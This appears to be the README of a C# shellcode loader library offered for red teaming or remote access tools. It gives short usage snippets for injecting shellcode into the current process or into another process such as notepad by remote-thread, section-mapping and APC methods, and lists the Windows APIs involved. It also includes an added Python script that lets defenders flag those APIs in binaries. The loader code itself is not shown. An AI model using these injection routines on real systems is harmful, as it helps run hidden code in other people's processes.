ShellCodeLoaderCSharp
A small shellcode loader library written in C#
ShellCodeLoader
A small shellcode loader library written in C#.

This library lets you inject shellcode into the memory of the currently running process or of any other process, using several techniques. Useful for red teaming or in a remote access tool. Works with 32-bit and 64-bit shellcode.
Note :
- Has been tested on the same process and with notepad as target
I added some test payloads which I've converted with
- First with : Donut (https://github.com/TheWover/donut) : turns my payload into raw shellcode
- Second with HxD Editor (https://mh-nexus.de/en/downloads.php?product=HxD20) : gives me an array of raw bytes from payloads converted with Donut
How to use it ?
For same process:
```csharp
// PayloadCpp64.rawData is one of the bundled test payloads (a raw byte array).
ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp64.rawData);
cpp.LoadWithKernel32(); // alternatives: LoadWithNTDelegates, LoadWithKernel32Delegates or LoadWithNT
cpp.Dispose();
```
For other processes:
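```csharp
// Requires: using System.Diagnostics;
// Throws IndexOutOfRangeException if no notepad process is running.
Process Target = Process.GetProcessesByName("notepad")[0];
ShellCodeLoader.ShellCodeLoaderEx cpp = new ShellCodeLoader.ShellCodeLoaderEx(Target, PayloadCpp64.rawData);
cpp.LoadWithKernel32(); // or cpp.LoadWithNT();
cpp.Dispose();
```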
MapView:
```csharp
ShellCodeLoader.MapView cpp = new ShellCodeLoader.MapView(PayloadCpp64.rawData);
cpp.LoadWithNtMapView();
cpp.Dispose();
```
MapView with target:
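```csharp
// Target is a System.Diagnostics.Process, obtained as in the "other processes" example.
ShellCodeLoader.MapView cpp = new ShellCodeLoader.MapView(Target, PayloadCpp64.rawData);
cpp.LoadWithNtMapView();
cpp.Dispose();
```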
QueueAPC:
```csharp
ShellCodeLoader.QueueAPC cpp = new ShellCodeLoader.QueueAPC(PayloadCpp64.rawData);
cpp.LoadWithQueueAPC();
cpp.Dispose();
```
Minimal API:
```csharp
ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI cpp = new ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI(PayloadCpp64.rawData);
cpp.Asynchronous = true; // true wraps the load in Task.Run so the main thread is not blocked; false otherwise
cpp.LoadWithMinimalAPI();
cpp.Dispose();
```
Includes :
- Asynchronous (a simple Task.Run to not block main thread)
- Loading with Kernel32
- Loading with NtDll
- NtDll : NtAllocateVirtualMemory
- NtDll : NtWriteVirtualMemory
- NtDll : NtProtectVirtualMemory
- NtDll : NtFreeVirtualMemory
- NtDll : NtCreateThreadEx
- NtDll : NtCreateSection
- NtDll : NtMapViewOfSection
- NtDll : NtTestAlert
- Kernel32 : GetCurrentProcess
- Kernel32 : VirtualAlloc
- Kernel32 : VirtualAllocEx
- Kernel32 : VirtualFree
- Kernel32 : VirtualProtect
- Kernel32 : VirtualProtectEx
- Kernel32 : WriteProcessMemory
- Kernel32 : CreateRemoteThread
- Kernel32 : GetModuleHandle
- Kernel32 : GetProcAddress
- Kernel32 : QueueUserAPC
- Kernel32 : SleepEx
- Enumeration : PageProtection
- Enumeration : TypeAlloc
- Enumeration : FreeType
- Enumeration : SectionAccess
- Enumeration : MappingAttributes
- Delegates : all functions have been written with delegate style except GetModuleHandle and GetProcAddress
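
For defenders triaging an unknown .NET binary, the API names in the list above are useful static indicators. The following is an added example, not part of this project's code, that scans a file's bytes for those names in both UTF-8 and UTF-16LE; the technique grouping, the `find_name`, `triage` and `us` helpers and the sample bytes are assumptions constructed for illustration.

```python
import re

# API names come from the README's "Includes" list. Grouping them into
# techniques is this example's assumption, not the project's documentation.
TECHNIQUES = {
    "remote thread (Kernel32)": ("VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"),
    "remote thread (NtDll)": ("NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtCreateThreadEx"),
    "section map view": ("NtCreateSection", "NtMapViewOfSection"),
    "APC queue": ("QueueUserAPC", "NtTestAlert"),
}
IDENT = rb"[A-Za-z0-9_]"

def find_name(data: bytes, name: str) -> set:
    """Encodings ('utf8', 'utf16') in which name occurs as a whole identifier."""
    # Boundary checks stop VirtualAlloc from matching inside VirtualAllocEx.
    u8 = rb"(?<!%b)%b(?!%b)" % (IDENT, re.escape(name.encode()), IDENT)
    u16 = rb"(?<!%b\x00)%b(?!%b\x00)" % (IDENT, re.escape(name.encode("utf-16-le")), IDENT)
    found = set()
    if re.search(u8, data):
        found.add("utf8")    # P/Invoke import names live in metadata as UTF-8
    if re.search(u16, data):
        found.add("utf16")   # C# string literals are stored as UTF-16LE
    return found

def triage(data: bytes) -> dict:
    hits = {n: find_name(data, n) for apis in TECHNIQUES.values() for n in apis}
    complete = [t for t, apis in TECHNIQUES.items() if all(hits[n] for n in apis)]
    # Names seen only as UTF-16 literals alongside GetProcAddress point to
    # runtime resolution (assumed here to be what "delegate style" means).
    literal_only = sorted(n for n, enc in hits.items() if enc == {"utf16"})
    resolver = bool(find_name(data, "GetProcAddress"))
    return {"techniques": complete, "runtime_resolved": literal_only if resolver else []}

# Constructed sample: fragments laid out like a .NET assembly's string heaps.
def us(s: str) -> bytes:  # user-string entry: length prefix, UTF-16LE, flag byte
    return bytes([2 * len(s) + 1]) + s.encode("utf-16-le") + b"\x00"

SAMPLE = (b"\x00kernel32.dll\x00GetProcAddress\x00VirtualAlloc\x00"
          + us("VirtualAllocEx") + us("WriteProcessMemory")
          + us("CreateRemoteThread") + us("NtCreateSection"))

if __name__ == "__main__":
    print(triage(SAMPLE))
```

A technique is reported only when every API in its group is present, so the lone `NtCreateSection` literal in the sample is listed as runtime-resolved but does not flag the section-mapping group.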
TODO :
- <s>Inject shellcode in another process with VirtualEx and NtEx functions</s>
- Check if shellcode is 64 or 32 bit before injection
- Check if the DLLs (kernel32, ntdll) have been loaded
Known :
- Debugging 32 bit test injection involves PInvokeStackImbalance
